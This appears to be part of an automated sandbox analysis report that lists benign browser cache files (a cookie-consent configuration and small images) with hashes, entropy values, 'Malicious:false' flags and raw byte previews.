                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Oy9Dwb40zrvdip5GKZa6AyYs9vjxWCKTS2jQt4ZaX:zqlipc6vxLCSCbZaX
                                                                                                                                                                                                                              MD5:073E1A67C16B7E2B0F240F20BAC53174
                                                                                                                                                                                                                              SHA1:778663FBA0201814BE193EB38E4F9D8875F322ED
                                                                                                                                                                                                                              SHA-256:886E0D5D43DFB17D92EB8C5C80AB0671ED9DE247EC4AD9D71B358F32F7613287
                                                                                                                                                                                                                              SHA-512:97FA869A8BE850E759BDB5AAA0E850B787358CC4EED55796F6B51D1AFD5B6B25CF7A6FAC5FCD67AA9588876F208D40449ED94886046177B6FEAA083743B01696
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":true,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","gb","ws","gd","ge","gg"
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAHxkqw[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                              Entropy (8bit):7.63276321014427
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7vOWYWeiBpmTUOEd01LuUviHQKP1tha71TDeII+HKV9WGGd4BzLNjFQFP68:IPec4UOEkIQK5CTiGSXGP68
                                                                                                                                                                                                                              MD5:9EC146F1EC3EEF5735E36A1BE63B9C67
                                                                                                                                                                                                                              SHA1:411DA70ACA1DB1A0D3F8B5F1ED616BD30C7AF310
                                                                                                                                                                                                                              SHA-256:63C7EAE620F3D8F17ED979A7A09CCBFFB1577FCE29772CC3C8FEB1B6C2751856
                                                                                                                                                                                                                              SHA-512:1F684E83509B4D92A9651ED1DDB35F09B206EE3824546BADD3CB2FD565155D752439A47E39E23F95C4051247F5DA37E8329769C3750A93D1D99CD47D7A5A17E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx.%S=kTA.=..6&f7.M0b...v.....$..j.../...VP.H.E,R. J..?!.hc..IV.Z.Y7.........f.~.{....H..`.$X..m.M.h<.......0).......\.2....,.Ld..14&.ebZ. ....._.........+y...n..$....`......c@O..|b.......r....... m.....o.q}...}...?,.M.Go......0J.*..E....j#}....'..d......y....Ex.......NV"+G.cs.....;...+.V...".....w...W...@..$..rI_..V..m...I"...][3^..C.'..<...,...C.yH9*...~<..V..U4%A.d...%._,p'a....E....._."...Z..\...Z.vu.{.7 .r"...).z._....IT...B..b..".T.....~m r>.%I...lXdSg.D.O.C...z..!..G$.P...4.e9}...U..c:a(M.).{...B...$..mA.+=...XA...<.p...6.F.b...d.?ESL(...J...z..G.R......z.I.t:.....+TF.>T..)..D5"y....H....r)\...7.....xafF3$...........(.T.....&a1%........:..B*.H..A.G.H....v.....8.L._}......IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQT0oN[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49430
                                                                                                                                                                                                                              Entropy (8bit):7.968250182302868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ISMx6UYVvLG0DAyhz+1V+dqheEiic7giJRS8p3BDvaUj5OeGWFxl4e2fxgspTlQ/:ISMsUYVHbmEdqheH/gRkvaUNhGeke+zS
                                                                                                                                                                                                                              MD5:778D5F7FF643535754426B22D1655699
                                                                                                                                                                                                                              SHA1:033850198C0E81418CCF29ADAEA98D8814AA5F96
                                                                                                                                                                                                                              SHA-256:79E97D0F92A1E054FE44AAD7CDBF21C2D918DF000B9C0DB374DC3B186AA212C1
                                                                                                                                                                                                                              SHA-512:B5C228EC6033866669A7D3B36FA29BE171B48745F0FDF857E330B0EE31AF36BAEACDE2CBA7DB62C8DBA84E9736EDA62DC6811A27C1B0F793F6D915032F570B38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....$b.0c....'...Vb..^.H.a!y>....9.Ri.]%.F.q..\.Z.......[N.H.2.........[...#a....f..z..}ji4..m.....Cf...*...?.U....;....Z.....H...@..rv.....N.o..1..0..0pzR...Nv,.s.ED.{".=..k...s..o...|..P._C.*.mH.._....v...Jn..rI.....N.B.......P.Td.*9.8.0h.q`.$0..Fw).}G.@..M...6.U..#.0.T".J7g.P.<.;..t...:fb...R.(.B..I.47.Ei%'....v..0+.c.R..3....{.q3.Ad[.WN.F.n...1Z.'cGI.&....y[.p6..8...L
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQVPm6[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2403
                                                                                                                                                                                                                              Entropy (8bit):7.807847874907652
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:QfAuETAzOifN8pL/nF/TFZoTy7zOWk0ljjGzRi3wWLtWOqO+zgtO:Qf7EwN8tndAW7zI0l0SRnqO+zgtO
                                                                                                                                                                                                                              MD5:10BDCE1F28F778B6F7C76D396A88A0A3
                                                                                                                                                                                                                              SHA1:705B774818562E65F4C0DC64A08D8D1E38932772
                                                                                                                                                                                                                              SHA-256:EB966433ADA42DEA9BE343ECAFA32C13851D1ADAF91734E0697D96AE3B876D0A
                                                                                                                                                                                                                              SHA-512:1BD59BED9431C26C14AA4545A6B459680BBDD855E20CE1FE2A5BD4B861DAA793CA9FA6EAF96F353099440E80DD2046E54577DD0B329C45B8EA5FE13CB08B67D0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....O.GO.a.._+......f.wF....LBP.LB........i\[.e......(?3...t(.jd..3..bj.... uR..z-.7t?.6W..5$[Y..\.P.}*Z.............~..3.f...y.+)9hkN......=Z0N#..o.uTWFQvg~k..m.&h.."....i..n..#..M\..-]....K..r..y<7SM..[U..|{......TeqN...h.S# ..fz..o.O....l|......T.:Z@@..4..[....).EgQ7-..?.c.T.`..k..=2.....7...\.Y.-Q).2{kV.-....cM!66....Q...Rj.(.d..{...Z.#...Oj.KPI....t.1G?.....j....7Z..Z%.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQVTlD[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11634
                                                                                                                                                                                                                              Entropy (8bit):7.950478399271463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QnXAknmy3tImAVaB4KGSiFtapviNhXgb63atNrT14vc7PX2XpnSkUMJjcmX+:0XAknB3tIDk4/7fNhXgbUatNrT1tott+
                                                                                                                                                                                                                              MD5:4168D8846819EE038AF7AC491FDB0EF5
                                                                                                                                                                                                                              SHA1:2933B9B253C14D9D515D4E7065BCE93243B819FD
                                                                                                                                                                                                                              SHA-256:85721294758FCF121AF77C628960BD6379D9F6D9A69B888CA5EEBE12790173CA
                                                                                                                                                                                                                              SHA-512:2F85B52188672BB53F92C7B80A8F2E3B2B31D0E6F99A3CB4D5D2C89A5F414CCC697DD6709689E619126902E6D0F7CB7866C8A2B3E6EECA8D3319F438DBBF8523
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...:.. ...e....[.GbD?/.jFt..l..=.....H.$(......(....1.].."....\.4...~./.....%.kck.G:...#..T7....$(......(.....\......E:.u.U...(.6..Z..n.K....]..\P.9<.............J..y.5v...2...>....*.Q..-LiM...d.f..{......KX..[.$n... b..<.......,........CE..n..E.. .S..i.....w.....P...1.P.c]F!@..y.e..........Z.{......jJ:?.77.......Y!@....P.@.........5?....3...D_..?..XKr...?. ......1U
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQXiHB[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17033
                                                                                                                                                                                                                              Entropy (8bit):7.94429179620019
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NVO6pyWhfl83GcC7xW+xUKp8NL0y5pFBNJ+DD4CM:NRImaEWcp8NL0y5pFnJIDVM
                                                                                                                                                                                                                              MD5:C406E5C8E50D4B7C607A703682F00AEF
                                                                                                                                                                                                                              SHA1:79A5E6100B83552679B756D9CC9F30DEFA436D65
                                                                                                                                                                                                                              SHA-256:750DC3D45C232DD8E1127B7860F0E38E6C9A6BD3888F05615C18215179E8609C
                                                                                                                                                                                                                              SHA-512:0AF8BE812D1A05915C06EE377AD3CEB7C612A699238A3FDB07326FBDDD6E3539E8AC8FA643485383644FB67D1F284B0F52E81DCE75591D14CC5EFE950B798B32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...&....~Z.@.......Z...@.b..(.sO. PR7`l....J..ZL..&. #..D..........v..Q%0.A......fe.u.FE.|.`e..`B:..F.!.~..Q...Z.c4.V+......p;.........;...3@..W!3.&4.K....[.S_......ov.W)7!{.4.Er...zv..27.;..|....t....&b.2.@9. $..vh.wP....6t.......F..(.....'SH.N.M..%.N.f.%Y0h.O2......g........pz..M.z`d.L..P.V].....".h(....MU:....6....+..Y.Y54.8ni.,g.../.@.a\[.I95H..I.z.. ...A.+.&..h...J..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQXmCn[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2053
                                                                                                                                                                                                                              Entropy (8bit):7.7444838178786135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:QfAuETAChSTvvelFjDyUJRN5Hi/cqYmOJA+wUqFWnu:Qf7EA+VT2nCJfZqAu
                                                                                                                                                                                                                              MD5:BCF5C7A113C8BBAB535EDF9CCBE6490F
                                                                                                                                                                                                                              SHA1:C55BB801302CCE7ED433F2EC82F65E473EE27377
                                                                                                                                                                                                                              SHA-256:AE2DCD9205699F2D0A913DDC97A8B702E3A29555F2C1604B4A76C2BB18A8ACA8
                                                                                                                                                                                                                              SHA-512:ACE81D2D98AF4523D24607CFAF48226F1E24CF50F886C48CCEFCF1D9F65A799FF8E3F5B5ACAD3716FEAA0490CB56543406C5C95A72903D86D2900910CC32403E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.._..s...GyO........P...c.....F...Q.gc.5H...s..?.R$E.;...8...!......].o.zFj\.Y..N.#5.Hv%M>...*y...4k.....K.|...:....9..Z_..9O.`..g'.....c..?..Z.;0.W.y })..)*iR7R.q.#.......v;........3..#.....W..Q.QH..O.......qe..%>V.CM.}.O.S.b..u...?Z|..7.Fo.q.....X...x.\.u.-........1wZvat/.f.us.Qf.B.....'....ngo..>.....|..Q.G4P]..%.....t!F.?.F4{@.......i{F.....U..sH......+......E....Hbc..O.U
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAud6Gv[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):7.101459310090333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
                                                                                                                                                                                                                              MD5:A94D5FFB98CBCA323E6AEA6A826B9ACF
                                                                                                                                                                                                                              SHA1:D4F20C419292258A27A06511955A02400C767723
                                                                                                                                                                                                                              SHA-256:7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
                                                                                                                                                                                                                              SHA-512:D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx...j.A.....A..y..X....$.E.'.b.:.h!.bc%...:.FlD..L.@:...F...o...u..+.>nvf..v..n.;08..<.,C....-|A.x.D1.Mx....B.R>.......3..d@....%....v.Z...5.C....3@.a.[..iku.....%.(....p.h..m.](..s>F.&...q.^..dH......0<a1...4. .z.Q.@<W...,....4..?M.b......@{X..L..x...|:.B..B..K...j..k6/..LE@....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1dTzfp[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8890
                                                                                                                                                                                                                              Entropy (8bit):7.923808661823827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QnI3wmoo/Jq+krgOtxrcnVskmB7lxED4u+I9ocY5zwX9B:0I33oo/JqqOxrcnVskQK+lpY9B
                                                                                                                                                                                                                              MD5:29792D182BA22B3E036424650829BEFE
                                                                                                                                                                                                                              SHA1:BB13279B92AD154589A1569CA7AF19474B2FD832
                                                                                                                                                                                                                              SHA-256:E6CEE354D756A03B5404D34D7F7433CA55B5D32AC5199A0A508AD3A379AABE06
                                                                                                                                                                                                                              SHA-512:F137B17A8DD6783E5906BB8000A54B5FC5769DF5878369A48B5190CFA71392FA0352A4E92EC8F91D2A28BD9C5E977A101CDF0B52FD194ADEA5AB0FA0225CEABA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....A..M..P........T.....@>..yR....G.(..\.jC0.<-cqp.`.1.h.)2......W....fT...1...Q`.!o..I...ar..{.(1..#.)./|.|.?Jar...(~h$..0.#6./.F.QT.O..JW.#nH.H.'.`zR..c `.C..#.h..`......h....U.B.....&2h..}.#..=.".,.n..x.(...\..j.^L.<...2...z.Y3U{..zK...1:.).G.W.O+....(.....o....km.R...^2H;..KK...<G....N.h.c.....yY.w.sM.~..y...`....Yh..\..9....E'$..)..<...........J.(....z*.7K.M..dX.k
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1fdtSt[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):438
                                                                                                                                                                                                                              Entropy (8bit):7.245257101036661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                                                                                                                                                                                              MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                                                                                                                                                                                              SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                                                                                                                                                                                              SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                                                                                                                                                                                              SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.|.c.L.i.E.{.k..~.}.}........t...W...*.5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a...*.....D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1ftEY0[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):497
                                                                                                                                                                                                                              Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                                                                                                                                                                                                              MD5:7FBE5C45678D25895F86E36149E83534
                                                                                                                                                                                                                              SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                                                                                                                                                                                                              SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                                                                                                                                                                                                              SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx....N.A..=.....bC...RR..`'......v.{:.^..... ."1.2....P..p.....nA......o.....1...N4.9.>..8....g.,...|."...nL.#..vQ.......C.D8.D.0*.DR)....kl..|.......m...T..=.tz...E..y..... ..S.i>O.x.l4p~w......{...U..S....w<.;.A3...R*..F..S1..j..%...1.|.3.mG..... f+.,x....5.e..]lz..*.).1W..Y(..L`.J...xx.y{.*.\. ...L..D..\N........g..W...}w:.......@].j._$.LB.U..w'..S......R..:.^..[\.^@....j...t...?..<.............M..r..h....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB6Ma4a[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):368
                                                                                                                                                                                                                              Entropy (8bit):6.811857078347448
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                                                                                                                                                                                              MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                                                                                                                                                                                              SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                                                                                                                                                                                              SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                                                                                                                                                                                              SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.*t..|....)....(.$.`..a...d.qd.....3...W_...}.*...;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBXXVfm[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):842
                                                                                                                                                                                                                              Entropy (8bit):7.712790381238881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                                                                                                                                                                                              MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                                                                                                                                                                                              SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                                                                                                                                                                                              SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                                                                                                                                                                                              SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx.e.Oh\U......2.....65...\...].,ZT...Z(...U.....t...P.P..P(.n.Vl.JA......%3...h.i&3y/.z........}.;.|.<.J.6.fcr:LZ-..+...(...Pp.......,y..=..D......V:...Q,....r...5.hI[.a..A.....93.K>.st.........Dq..&....2)..bl.Y.........._..4Ag..s.(l?A..>..m.M.W..O...C....f.......r.^;<...r...n.....9.......t..<.I.r|......|1?S.|......#0..O@.6=}.....q.^..NX.9*.Gh..Q.!i6...A.,..&.5+...o...dod...J......D'CS:....../...:......X|..zH....$#}5K..x^.-.-.X>@.'.W .+.~../..z.o_H.~IF.f.o.}[,.eh,=.....W-....Tf?..........t5$~b...Pgq..6..o}9v..'......KJ.I.|MT.....d..i..7..^.....i2....l..W.X..a.].V...UWf...fd....=.1~K....[.dX...dV..J.......eL....O.....R. .T._.wGr2...W.x. .W......I....4X....Y~.$.c...v\o_^...S......O.z..gV.T..............x...{..7..3i.@%.....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBY7ARN[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):779
                                                                                                                                                                                                                              Entropy (8bit):7.670456272038463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                                                                                                                                                                                              MD5:30801A14BDC1842F543DA129067EA9D8
                                                                                                                                                                                                                              SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                                                                                                                                                                                              SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                                                                                                                                                                                              SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                                                                                                                                                                                              Malicious:false
